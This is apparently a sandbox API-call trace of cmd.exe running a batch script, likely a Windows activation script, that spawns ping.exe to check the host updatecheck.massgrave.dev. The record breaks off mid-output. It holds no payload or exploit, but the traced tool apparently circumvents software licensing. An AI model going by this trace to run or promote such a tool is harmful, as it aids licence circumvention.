[0178.592] UpdateProcThreadAttribute (in: lpAttributeList=0xa68998eed0, dwFlags=0x0, Attribute=0x60001, lpValue=0xa68998edbc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa68998eed0, lpPreviousValue=0x0) returned 1 [0178.592] GetStartupInfoW (in: lpStartupInfo=0xa68998ee60 | out: lpStartupInfo=0xa68998ee60*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20, hStdOutput=0x98, hStdError=0x28)) [0178.593] GetProcessHeap () returned 0x2763aa30000 [0178.593] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x20) returned 0x2763aa37050 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0178.593] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0178.594] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0178.595] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0178.595] GetProcessHeap () returned 0x2763aa30000 [0178.596] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa37050) returned 1 [0178.596] GetProcessHeap () returned 0x2763aa30000 [0178.596] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x12) returned 0x2763aa38d50 [0178.596] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0178.600] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\PING.EXE", lpCommandLine="ping -4 -n 1 updatecheck.massgrave.dev", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0xa68998edf0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -4 -n 1 updatecheck.massgrave.dev", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa68998edd8 | out: lpCommandLine="ping -4 -n 1 updatecheck.massgrave.dev", lpProcessInformation=0xa68998edd8*(hProcess=0x8c, hThread=0x88, dwProcessId=0xe20, dwThreadId=0xe24)) returned 1 [0178.620] CloseHandle (hObject=0x88) returned 1 [0178.620] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.620] GetProcessHeap () returned 0x2763aa30000 [0178.621] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa3b230) returned 1 [0178.621] GetEnvironmentStringsW () returned 0x2763aa3b230* [0178.621] GetProcessHeap () returned 0x2763aa30000 [0178.621] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xfbe) returned 0x2763aa3c200 [0178.621] memcpy (in: _Dst=0x2763aa3c200, _Src=0x2763aa3b230, _Size=0xfbe | out: _Dst=0x2763aa3c200) returned 0x2763aa3c200 [0178.621] FreeEnvironmentStringsA (penv="=") returned 1 [0178.621] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) returned 0x0 [0178.854] GetExitCodeProcess (in: hProcess=0x8c, lpExitCode=0xa68998ed58 | out: lpExitCode=0xa68998ed58*=0x0) returned 1 [0178.854] CloseHandle (hObject=0x8c) returned 1 [0178.854] _vsnwprintf (in: _Buffer=0xa68998ef18, _BufferCount=0x13, _Format="%08X", _ArgList=0xa68998ed68 | out: _Buffer="00000000") returned 8 [0178.855] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0178.855] GetProcessHeap () returned 0x2763aa30000 [0178.856] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa3c200) returned 1 [0178.856] GetEnvironmentStringsW () returned 0x2763aa3b230* [0178.856] GetProcessHeap () returned 0x2763aa30000 [0178.856] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xfbe) returned 0x2763aa3c200 [0178.856] memcpy (in: _Dst=0x2763aa3c200, _Src=0x2763aa3b230, _Size=0xfbe | out: _Dst=0x2763aa3c200) returned 0x2763aa3c200 [0178.856] FreeEnvironmentStringsA (penv="=") returned 1 [0178.856] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0178.856] GetProcessHeap () returned 0x2763aa30000 [0178.859] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa3c200) returned 1 [0178.859] GetEnvironmentStringsW () returned 0x2763aa3b230* [0178.859] GetProcessHeap () returned 0x2763aa30000 [0178.859] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xfbe) returned 0x2763aa3c200 [0178.859] memcpy (in: _Dst=0x2763aa3c200, _Src=0x2763aa3b230, _Size=0xfbe | out: _Dst=0x2763aa3c200) returned 0x2763aa3c200 [0178.859] FreeEnvironmentStringsA (penv="=") returned 1 [0178.859] GetProcessHeap () returned 0x2763aa30000 [0178.859] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa38d50) returned 1 [0178.859] DeleteProcThreadAttributeList (in: lpAttributeList=0xa68998eed0 | out: lpAttributeList=0xa68998eed0) [0178.859] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.859] SetConsoleMode (hConsoleHandle=0x98, dwMode=0x0) returned 0 [0178.859] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.859] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0178.859] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.859] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.860] SetConsoleInputExeNameW () returned 0x1 [0178.860] GetConsoleOutputCP () returned 0x1b5 [0178.860] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.861] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.861] exit (_Code=0) Thread: id = 72 os_tid = 0xe00 Process: id = "20" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x3aea1000" os_pid = "0xe20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xde4" cmd_line = "ping -4 -n 1 updatecheck.massgrave.dev" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1400 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1401 start_va = 0x189db30000 end_va = 0x189dbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000189db30000" filename = "" Region: id = 1402 start_va = 0x189dc00000 end_va = 0x189ddfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000189dc00000" filename = "" Region: id = 1403 start_va = 0x1e4e1780000 end_va = 0x1e4e179ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e4e1780000" filename = "" Region: id = 1404 start_va = 0x1e4e17a0000 end_va = 0x1e4e17b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e4e17a0000" filename = "" Region: id = 1405 start_va = 0x1e4e17c0000 end_va = 0x1e4e17c3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e4e17c0000" filename = "" Region: id = 1406 start_va = 0x1e4e17d0000 end_va = 0x1e4e17d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e4e17d0000" filename = "" Region: id = 1407 start_va = 0x1e4e17e0000 end_va = 0x1e4e17e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e4e17e0000" filename = "" Region: id = 1408 start_va = 0x7df5ff840000 end_va = 0x7ff5ff83ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff840000" filename = "" Region: id = 1409 start_va = 0x7ff619ba0000 end_va = 0x7ff619bc2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff619ba0000" filename = "" Region: id = 1410 start_va = 0x7ff61a160000 end_va = 0x7ff61a16afff monitored = 1 entry_point = 0x7ff61a163330 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 1411 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1412 start_va = 0x1e4e17f0000 end_va = 0x1e4e198ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e4e17f0000" filename = "" Region: id = 1413 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1414 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1415 start_va = 0x1e4e1780000 end_va = 0x1e4e178ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001e4e1780000" filename = "" Region: id = 1416 start_va = 0x7ff619aa0000 end_va = 0x7ff619b9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff619aa0000" filename = "" Region: id = 1417 start_va = 0x1e4e1990000 end_va = 0x1e4e1a4dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1418 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1419 start_va = 0x189de00000 end_va = 0x189de7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000189de00000" filename = "" Region: id = 1420 start_va = 0x7ffbed7a0000 end_va = 0x7ffbed80afff monitored = 0 entry_point = 0x7ffbed7b90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1421 start_va = 0x7ffbe2f40000 end_va = 0x7ffbe2f77fff monitored = 0 entry_point = 0x7ffbe2f58cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1422 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1423 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1424 start_va = 0x1e4e1a50000 end_va = 0x1e4e1b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e4e1a50000" filename = "" Region: id = 1425 start_va = 0x1e4e1790000 end_va = 0x1e4e1796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e4e1790000" filename = "" Region: id = 1426 start_va = 0x1e4e17f0000 end_va = 0x1e4e17f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e4e17f0000" filename = "" Region: id = 1427 start_va = 0x1e4e1890000 end_va = 0x1e4e198ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001e4e1890000" filename = "" Region: id = 1428 start_va = 0x7ffbed810000 end_va = 0x7ffbed817fff monitored = 0 entry_point = 0x7ffbed811ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1429 start_va = 0x7ffbe9850000 end_va = 0x7ffbe98abfff monitored = 0 entry_point = 0x7ffbe9866f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1430 start_va = 0x7ffbe89f0000 end_va = 0x7ffbe8a99fff monitored = 0 entry_point = 0x7ffbe8a17910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1431 start_va = 0x7ffbe2980000 end_va = 0x7ffbe29e6fff monitored = 0 entry_point = 0x7ffbe29863e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1432 start_va = 0x7ffbe9e10000 end_va = 0x7ffbe9e38fff monitored = 0 entry_point = 0x7ffbe9e24530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1433 start_va = 0x7ffbe1460000 end_va = 0x7ffbe1469fff monitored = 0 entry_point = 0x7ffbe14614c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1434 start_va = 0x7ffbe2a50000 end_va = 0x7ffbe2a5afff monitored = 0 entry_point = 0x7ffbe2a51d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1435 start_va = 0x189de80000 end_va = 0x189defffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000189de80000" filename = "" Region: id = 1436 start_va = 0x7ffbe0d70000 end_va = 0x7ffbe0d79fff monitored = 0 entry_point = 0x7ffbe0d715c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 1437 start_va = 0x7ffbe0d60000 end_va = 0x7ffbe0d67fff monitored = 0 entry_point = 0x7ffbe0d610a0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1438 start_va = 0x7ffbe0d50000 end_va = 0x7ffbe0d57fff monitored = 0 entry_point = 0x7ffbe0d51ab0 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1439 start_va = 0x1e4e1800000 end_va = 0x1e4e1802fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 1440 start_va = 0x189df00000 end_va = 0x189df7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000189df00000" filename = "" Thread: id = 73 os_tid = 0xe24 [0178.676] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff61a160000 [0178.676] __set_app_type (_Type=0x1) [0178.676] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff61a163540) returned 0x0 [0178.676] __wgetmainargs (in: _Argc=0x7ff61a1660e8, _Argv=0x7ff61a1660f0, _Env=0x7ff61a1660f8, _DoWildCard=0, _StartInfo=0x7ff61a166104 | out: _Argc=0x7ff61a1660e8, _Argv=0x7ff61a1660f0, _Env=0x7ff61a1660f8) returned 0 [0178.676] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.678] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0178.678] __iob_func () returned 0x7ffbed90e210 [0178.679] _fileno (_File=0x7ffbed90e240) returned 1 [0178.679] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.679] GetFileType (hFile=0x98) returned 0x3 [0178.679] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf530, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.679] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x7ff61a1677a0 | out: lpWSAData=0x7ff61a1677a0) returned 0 [0178.686] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x189dbaf3c0 | out: phkResult=0x189dbaf3c0*=0x94) returned 0x0 [0178.686] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x189dbaf3e0, lpData=0x189dbaf388, lpcbData=0x189dbaf394*=0x4 | out: lpType=0x189dbaf3e0*=0x0, lpData=0x189dbaf388*=0x0, lpcbData=0x189dbaf394*=0x4) returned 0x2 [0178.686] RegCloseKey (hKey=0x94) returned 0x0 [0178.686] GetIpForwardTable (in: pIpForwardTable=0x0, pdwSize=0x189dbaf394, bOrder=0 | out: pIpForwardTable=0x0, pdwSize=0x189dbaf394) returned 0x7a [0178.689] GetAddrInfoW (in: pNodeName="updatecheck.massgrave.dev", pServiceName=0x0, pHints=0x189dbaf2b0*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x189dbaf318 | out: ppResult=0x189dbaf318*=0x0) returned 11001 [0178.689] GetAddrInfoW (in: pNodeName="updatecheck.massgrave.dev", pServiceName=0x0, pHints=0x189dbaf2b0*(ai_flags=2, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x189dbaf318 | out: ppResult=0x189dbaf318*=0x1e4e189ed90*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="updatecheck.massgrave.dev", ai_addr=0x1e4e18a40f0*(sa_family=2, sin_port=0x0, sin_addr="127.69.2.6"), ai_next=0x0)) returned 0 [0178.783] memcpy (in: _Dst=0x7ff61a167720, _Src=0x1e4e18a40f0, _Size=0x10 | out: _Dst=0x7ff61a167720) returned 0x7ff61a167720 [0178.783] FreeAddrInfoW (pAddrInfo=0x1e4e189ed90*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="updatecheck.massgrave.dev", ai_addr=0x1e4e18a40f0*(sa_family=2, sin_port=0x0, sin_addr="127.69.2.6"), ai_next=0x0)) [0178.783] IcmpCreateFile () returned 0x1e4e189e5c0 [0178.794] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1e4e189e830 [0178.794] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x1e4e18aaa10 [0178.794] GetNameInfoW (in: pSockaddr=0x7ff61a167720*(sa_family=2, sin_port=0x0, sin_addr="127.69.2.6"), SockaddrLength=0x10, pNodeBuffer=0x189dbaf470, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.69.2.6", pServiceBuffer=0x0) returned 0 [0178.812] __iob_func () returned 0x7ffbed90e210 [0178.812] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x189dbaf2e0, nSize=0x0, Arguments=0x189dbaf2e8 | out: lpBuffer="쫠Ǥ") returned 0x31 [0178.821] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.821] _fileno (_File=0x7ffbed90e240) returned 1 [0178.821] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.821] GetFileType (hFile=0x98) returned 0x3 [0178.822] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x189dbaf1c0, nSize=0x50 | out: lpBuffer="") returned 0x0 [0178.822] _fileno (_File=0x7ffbed90e240) returned 1 [0178.822] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0178.822] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging updatecheck.massgrave.dev [127.69.2.6] ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0178.822] LocalAlloc (uFlags=0x40, uBytes=0x32) returned 0x1e4e189f410 [0178.822] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging updatecheck.massgrave.dev [127.69.2.6] ", cchWideChar=-1, lpMultiByteStr=0x1e4e189f410, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging updatecheck.massgrave.dev [127.69.2.6] ", lpUsedDefaultChar=0x0) returned 50 [0178.822] _fileno (_File=0x7ffbed90e240) returned 1 [0178.822] _write (in: _FileHandle=1, _Buf=0x1e4e189f410*, _MaxCharCount=0x31 | out: _Buf=0x1e4e189f410*) returned 49 [0178.823] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0178.823] _fileno (_File=0x7ffbed90e240) returned 1 [0178.823] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0178.824] LocalFree 